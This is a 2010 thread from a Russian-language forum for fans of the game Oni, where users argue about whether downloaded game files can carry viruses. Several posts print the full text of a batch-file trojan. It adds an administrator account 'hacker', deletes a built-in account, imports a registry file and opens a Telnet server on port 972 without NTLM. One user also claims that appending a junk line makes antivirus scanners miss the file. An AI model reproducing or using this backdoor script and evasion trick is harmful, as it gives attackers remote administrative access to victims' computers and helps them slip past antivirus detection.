Форум Oni

Русскоязычный форум поклонников игры «Они» от Bungie

  • Здравствуйте, Гость

#61 08-06-2010 20:01:13

Manticore 
VIP
Регистрация: 10-04-2009
Сообщений: 1108
Профиль

Re: Защита от вирусов, троянов и т.д.

demos_kratos написал(а):

Или ты думаешь все 600 и более человек, скачавших <что-либо>, слепые и не заметили вируса?

Я сейчас провел эксперимент. Взял bat троянчика, проверил антивирусами - написали "Заражен". Написал я в конце bat файла на новой строчке аброкадабру. Все антивирусы написали "Не заражен". Запустил я троянчик с аброкадаброй в админе. Он сделал все свои грязные дела, обойдя антивирусы! Таким образом троянчик может обмануть всех 600 и более человек!
В трекере скорость низкая, а в локалке -высокая!
С ограниченными правами троянчик ничего не сломал!
Пароли надо держать в запароленном rar архиве, а не в открытую!!

Отредактировал(а) Manticore (08-06-2010 20:02:57)

Оффлайн

 

#62 09-06-2010 04:02:01

Блэцк (муж.)
Полицейский TCTF
Регистрация: 03-06-2010
Сообщений: 84
Профиль

Re: Защита от вирусов, троянов и т.д.

Manticore написал(а):

Если популярный и известный - значит не заражен? С чего вы взяли?

Ну это уже странно. У тебя боязень вирусов? На хорошем торренте раздачи с вирусами закрывают


http://s2.rimg.info/ec4721604fb0ed1a96a37c3185b01be2.gif

Оффлайн

 

#63 09-06-2010 06:41:23

Manticore 
VIP
Регистрация: 10-04-2009
Сообщений: 1108
Профиль

Re: Защита от вирусов, троянов и т.д.

Вирус могут не найти, особенно если новый, и активироваться он может через 2 недели после запуска игры. Выложили игру, вроде не зараженная, а потом через 2 недели хоп - и компы сломались. И непонятно где заразился.

Вот троян, тело bat файла:

chcp 1251
net user SUPPORT_388945a0 /delete
net user hacker hack /add
net localgroup Администраторы hacker /add
net localgroup Пользователи SUPPORT_388945a0 /del
regedit /s conf.reg
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet

Антивирусы сразу кричат что опасен
Теперь напишем так

chcp 1251
net user SUPPORT_388945a0 /delete
net user hacker hack /add
net localgroup Администраторы hacker /add
net localgroup Пользователи SUPPORT_388945a0 /del
regedit /s conf.reg
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet
sdbhubvgsrhbghs

Троян остался таким же работоспосбным и опасным, но из-за "sdbhubvgsrhbghs" антивирусы пишут "Не заражен" и никак не блокируют угрозу! Вот так на раздаче можно обмануть антивирусы!

P.S. Если надумаете его попробовать, удалите жало
net user SUPPORT_388945a0 /delete
net localgroup Пользователи SUPPORT_388945a0 /del

Отредактировал(а) Manticore (09-06-2010 06:43:12)

Оффлайн

 

#64 09-06-2010 06:59:00

Блэцк (муж.)
Полицейский TCTF
Регистрация: 03-06-2010
Сообщений: 84
Профиль

Re: Защита от вирусов, троянов и т.д.

Да тебе надо в лабораторию Касперского идти работать...


http://s2.rimg.info/ec4721604fb0ed1a96a37c3185b01be2.gif

Оффлайн

 

#65 09-06-2010 07:03:22

Manticore 
VIP
Регистрация: 10-04-2009
Сообщений: 1108
Профиль

Re: Защита от вирусов, троянов и т.д.

Блэцк, ты говорил у тебя Касперский? Проверь в госте, обманет ли его "sdbhubvgsrhbghs" ?

Оффлайн

 

#66 09-06-2010 07:05:11

Блэцк (муж.)
Полицейский TCTF
Регистрация: 03-06-2010
Сообщений: 84
Профиль

Re: Защита от вирусов, троянов и т.д.

Не буду рисковать. Машина новая.


http://s2.rimg.info/ec4721604fb0ed1a96a37c3185b01be2.gif

Оффлайн

 

#67 09-06-2010 07:08:48

Мih@ 
Регистрация: 27-08-2006
Сообщений: 826
Профиль

Re: Защита от вирусов, троянов и т.д.

Manticore написал(а):

антивирусы пишут "Не заражен"

ЧЯДНТ?

Оффлайн

 

#68 09-06-2010 07:11:00

Manticore 
VIP
Регистрация: 10-04-2009
Сообщений: 1108
Профиль

Re: Защита от вирусов, троянов и т.д.

Блэцк, bat файл не надо создавать. Создаешь txt (это неисполняемое расширение), кидаешь туда первый вариант и сканируешь. Потом добавляешь "sdbhubvgsrhbghs" в конце и сканируешь.

Мih@ написал(а):

ЧЯДНТ?

Вы в конце добавили "sdbhubvgsrhbghs"? Можно команды местами поменять, в середине что-то добавить. Вообщем, модифицировать файл.

Отредактировал(а) Manticore (09-06-2010 07:12:51)

Оффлайн

 

#69 09-06-2010 07:13:53

Блэцк (муж.)
Полицейский TCTF
Регистрация: 03-06-2010
Сообщений: 84
Профиль

Re: Защита от вирусов, троянов и т.д.

Ну и что? Молчит мой антивирус без "sdbhubvgsrhbghs" . И с "sdbhubvgsrhbghs"  молчит


http://s2.rimg.info/ec4721604fb0ed1a96a37c3185b01be2.gif

Оффлайн

 

#70 09-06-2010 07:17:27

Мih@ 
Регистрация: 27-08-2006
Сообщений: 826
Профиль

Re: Защита от вирусов, троянов и т.д.

Manticore написал(а):

Вы в конце добавили "sdbhubvgsrhbghs"?

а по длине файла незаметно?
$ md5sum file.bat && cat file.bat
7f552f2182f20b55aa42f5db9e7e5894  file.bat
chcp 1251
net user SUPPORT_388945a0 /delete
net user hacker hack /add
net localgroup Администраторы hacker /add
net localgroup Пользователи SUPPORT_388945a0 /del
regedit /s conf.reg
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet
sdbhubvgsrhbghs


Manticore написал(а):

Вообщем, модифицировать файл.

ну покажи, как. :3

Оффлайн

 

#71 09-06-2010 07:18:00

Manticore 
VIP
Регистрация: 10-04-2009
Сообщений: 1108
Профиль

Re: Защита от вирусов, троянов и т.д.

Мой Аваст не молчит. Ты нажал "сканировать файл"? Значит его нет в антивирусной базе Касперского =(. Аваст выиграл =) .

Оффлайн

 

#72 09-06-2010 07:19:45

Блэцк (муж.)
Полицейский TCTF
Регистрация: 03-06-2010
Сообщений: 84
Профиль

Re: Защита от вирусов, троянов и т.д.

Бред какой-то очередной. ВОТ КАК txt может нести угрозу если он не исполняемый?


http://s2.rimg.info/ec4721604fb0ed1a96a37c3185b01be2.gif

Оффлайн

 

#73 09-06-2010 07:27:04

Manticore 
VIP
Регистрация: 10-04-2009
Сообщений: 1108
Профиль

Re: Защита от вирусов, троянов и т.д.

В txt я сказал переименовать, чтоб он тебе ничено не попортил. Он легко может стать bat файлом, и тогда будет опасен. На txt аваст пишет "Обнаружена угроза".
Антивирус запрещает выполнять действия. И ограничения прав тоже запрещают. В чем разница? Оба запрещают.

Отредактировал(а) Manticore (09-06-2010 07:29:38)

Оффлайн

 

#74 09-06-2010 07:30:52

demos_kratos (муж.)
Рядовой чатланин
Откуда: Волжский
Регистрация: 25-07-2008
Сообщений: 694
Профиль  Вебсайт

Re: Защита от вирусов, троянов и т.д.

Мант, ты, как вирусофоб, просто обязан перейти на линукс. =3


I would put a tax... on all people... who stand... in water.
........
OOH!

Оффлайн

 

#75 09-06-2010 07:32:29

Блэцк (муж.)
Полицейский TCTF
Регистрация: 03-06-2010
Сообщений: 84
Профиль

Re: Защита от вирусов, троянов и т.д.

Ну если что-то серьезное будет то я возьму диск на котором написано "Windows7" и переустановлю ОС с форматом жесткого диска

Добавлено спустя 54 секунды:
О да. Линукс тоже выход


http://s2.rimg.info/ec4721604fb0ed1a96a37c3185b01be2.gif

Оффлайн

 

#76 09-06-2010 07:36:18

Manticore 
VIP
Регистрация: 10-04-2009
Сообщений: 1108
Профиль

Re: Защита от вирусов, троянов и т.д.

Зачем в винде есть команда net user SUPPORT_388945a0 /delete и net localgroup Пользователи SUPPORT_388945a0 /del , которая удаляет стандартную админскую учетку? Чтоб юзер контроль потерял над компом? Какая от этого польза?

Оффлайн

 

#77 09-06-2010 07:37:36

Мih@ 
Регистрация: 27-08-2006
Сообщений: 826
Профиль

Re: Защита от вирусов, троянов и т.д.

demos_kratos написал(а):

Мант, ты, как вирусофоб, просто обязан перейти на линукс. =3

судя по обсуждению работы с админскими правами и bat-вирусов, дело будет длиться до первого перлового однострочника. %)

Оффлайн

 

#78 09-06-2010 07:42:40

Блэцк (муж.)
Полицейский TCTF
Регистрация: 03-06-2010
Сообщений: 84
Профиль

Re: Защита от вирусов, троянов и т.д.

Manticore написал(а):

Зачем в винде есть команда net user SUPPORT_388945a0 /delete и net localgroup Пользователи SUPPORT_388945a0 /del , которая удаляет стандартную админскую учетку? Чтоб юзер контроль потерял над компом? Какая от этого польза?

Наверно надо если есть


http://s2.rimg.info/ec4721604fb0ed1a96a37c3185b01be2.gif

Оффлайн

 

#79 09-06-2010 08:09:11

demos_kratos (муж.)
Рядовой чатланин
Откуда: Волжский
Регистрация: 25-07-2008
Сообщений: 694
Профиль  Вебсайт

Re: Защита от вирусов, троянов и т.д.

Мih@ написал(а):

дело будет длиться до первого перлового однострочника.

Так это не вирус. Это патч =3


I would put a tax... on all people... who stand... in water.
........
OOH!

Оффлайн

 

#80 09-06-2010 08:16:19

Мih@ 
Регистрация: 27-08-2006
Сообщений: 826
Профиль

Re: Защита от вирусов, троянов и т.д.

demos_kratos написал(а):

Так это не вирус. Это патч =3

ну вот вышеупомянутый батник, который рассматривали, тоже был патчем, выпиливающим суперпользовательскую учётку, чтоб неповадно было. +)

Оффлайн

 

Board footer

© 2006-2024 Амэ & Mih@
ОНИмия – фан-сайт игры Oni
Движок форума - модифицированный PunBB